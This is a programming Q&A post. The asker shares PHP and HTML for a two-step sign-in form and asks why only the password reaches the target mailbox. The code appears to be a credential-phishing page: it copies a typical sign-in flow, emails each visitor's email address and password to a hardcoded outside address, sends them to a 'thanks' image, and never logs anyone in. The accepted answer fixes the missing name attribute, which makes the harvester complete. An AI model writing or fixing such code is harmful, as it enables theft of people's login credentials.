# How Can I Fix This 2-Paged PHP Login Script To Send User Input To An Email Address?

Tags: php, html

I have a two-paged PHP login form, which I want to send user input (email address and password) to an email address. But the script sends only password, but omits the associated email address.

What am I missing and how can I fix it?

Here are the files, page1.php, page2.php and processor.php:
**page1.php:**

```html
<!doctype html>
<html><head>
<meta charset="utf-8">
<title>2 Step Login - Page 1</title>
<link href="page1.css" rel="stylesheet">
</head>

<body>

<div id="formwrap">
<div id="form_inner">
    <div id="logo">
      <img src="" alt="logo">
    </div>
    <div id="email">
      
    </div>
  <div id="pwd">
      Sign in
  </div>
  <div id="form">
    
<?php

    if (isset($_GET['invalidEmail'])) {
        echo "Error: Invalid email address entered.";
    }
 
?>
    
    <form action="page2.php" method="post" enctype="multipart/form-data" name="form">
    
      <input id="username" name="email" type="email" placeholder="Email" autofocus required>
         
    <div id="forgot">No Yet A Member, Register Here</a></div>
    <input id="send" name="submit" type="submit" value="Next">
    </form>
  </div>
  </div>
</div>
</body>
</html>
```

**page2.php:**

```html
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>2 Step Login - Page 2</title>
<link href="page2.css" rel="stylesheet">
</head>

<body>

<div id="formwrap">
<div id="form_inner">
    <div id="logo">
      <img src="" alt="logo">
    </div>
    <div id="email">
<?php

 //On age 2
    $email = htmlentities($_POST['email']);
    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
        // the email address is not valid, redirect them back to page1.php
        header('Location: page1.php?invalidEmail=true');
 }else {
  echo "$email";
 }
 
?>
    </div>
  <div id="pwd">
      Enter password
  </div>
  <div id="form">
    <form action="login.php" method="post" enctype="multipart/form-data" name="form">
      <input type="hidden" value="<?=$email?>" />
      <input id="password" name="password" type="password" placeholder="Password" autofocus>
      <div id="chkbx">
<div id="inptch">
  <input id="keep_signed_in" name="keep_signed_in" type="checkbox" value="">
</div>
Keep me signed in</div>
    
    <div id="forgot">I Forgot My Password</div>
    <div id="different_account">Not A Member, Register Here</div>
    <input id="send" name="submit" type="submit" value="Sign in">
    </form>
  </div>
</div>
</div>
</body>
</html>
```

**login.php**

```html
<?php

session_start(); // before any HTML is echoed
 
if($_POST) {
    //$email = "";
    $email = $_POST['email'];
    $password = $_POST['password'];
     
    if(isset($_POST['email'])) {
        $email = str_replace(array("\r", "\n", "%0a", "%0d"), '', $_POST['email']);
        $email = filter_var($email, FILTER_VALIDATE_EMAIL);        
    }    
    if(isset($_POST['password'])) {
        $password = htmlspecialchars($_POST['password']);
    }
 
    $recipient = "emaillist2343@domain.com";
     
    $headers  = 'MIME-Version: 1.0' . "\r\n"
    .'Content-type: text/html; charset=utf-8' . "\r\n"
    .'From: ' . $email . "\r\n";
 
    $email_content .= "Email: $email";
    $email_content .= "Password: $password";
 
    echo $email_content;
     
    if(mail($recipient, $email_content, $headers)) {
       header("Location: thanks.jpg");
    echo "          <script language=javascript>
  //alert('Done, Click Ok');
  window.location='thanks.jpg';
  </script>";
    } else {
        echo '<p>ERROR! Please go back and try again.</p>';
    }
     
} else {
    echo '<p>Something went wrong</p>';
}
 
?>
```

Comment: Are you getting the Email with the From Address? `'From: ' . $email . "\r\n"`

Comment: @HarishST It's empty

Answer (score 3, accepted):

The problem is that you have not assigned a name attribute to

```
<input type="hidden" value="<?=$email?>" />
```

. You need to change it to this:

```
<input type="hidden" name="email" value="<?=$email?>" />
```

Comment: I'm very glad to help!